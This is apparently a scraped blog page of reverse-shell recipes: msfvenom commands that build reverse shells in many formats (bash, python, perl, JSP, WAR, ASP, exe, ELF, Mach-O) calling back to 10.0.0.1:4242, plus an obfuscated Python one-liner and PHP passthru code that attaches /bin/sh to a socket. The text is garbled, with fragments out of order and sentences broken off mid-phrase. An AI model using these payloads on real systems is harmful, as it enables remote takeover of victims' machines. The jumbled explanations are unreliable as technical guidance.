$ msfvenom -p cmd /unix /reverse_perl LHOST = "10.0.0.1 " LPORT = 4242 -f raw > $ msfvenom -p cmd /unix /reverse_bash LHOST = "10.0.0.1 " LPORT = 4242 -f raw > shell.sh $ msfvenom -p cmd /unix /reverse_python LHOST = "10.0.0.1 " LPORT = 4242 -f raw > shell.py $ msfvenom -p java /jsp_shell_reverse_tcp LHOST = "10.0.0.1 " LPORT = 4242 -f war > shell.war $ msfvenom -p java /jsp_shell_reverse_tcp LHOST = "10.0.0.1 " LPORT = 4242 -f raw > shell.jsp $ msfvenom -p windows /meterpreter /reverse_tcp LHOST = "10.0.0.1 " LPORT = 4242 -f asp > shell.asp $ msfvenom -p osx /x86 /shell_reverse_tcp LHOST = "10.0.0.1 " LPORT = 4242 -f macho > shell.macho $ msfvenom -p windows /meterpreter /reverse_tcp LHOST = "10.0.0.1 " LPORT = 4242 -f exe > shell.exe $ msfvenom -p linux /x86 /meterpreter /reverse_tcp LHOST = "10.0.0.1 " LPORT = 4242 -f elf > shell.elf Interestingly, the shell stays open even after the enclosing script finishes, so php max_execution_time isn't an -c "(lambda _y, _g, _contextlib: (lambda: None)])(_contextlib.nested(type('except', (), ), 's2p')]] for _g in ] for _g in ] for _g in ] for _g in ])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), _import_('contextlib'))" However, this has a drawback in that the shell can only redirect descriptors 1-9 so with descriptor 12, "$sock, 1=>$sock, 2=>$sock), $pipes) We can use this longer command to find out the highest-level file descriptor and use it in the redirection: passthru('FD=`ls /proc/self/fd | sort -rn | while read FD do test -S /proc/self/fd/$FD & echo $FD & break done` /bin/sh -i &3 2>&$FD') For instance, the above code works for mi when running php on a cli, but not when php is running as an apache module (there the socket is the fd 12 for me) However, if it is already opened the new connection will have a different descriptor and your shell won't be plugged where you want. Now, if the connection opened had the fd 3, the shell will attach to that descriptor. running /bin/sh -i with input and output redirected to the fd 3 and returning the last line (don't confuse php exec with shell/C exec).While at the same time you have a netcat listening on 1234. This is the code from the Metasploit payload (decoded from base64): /*
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |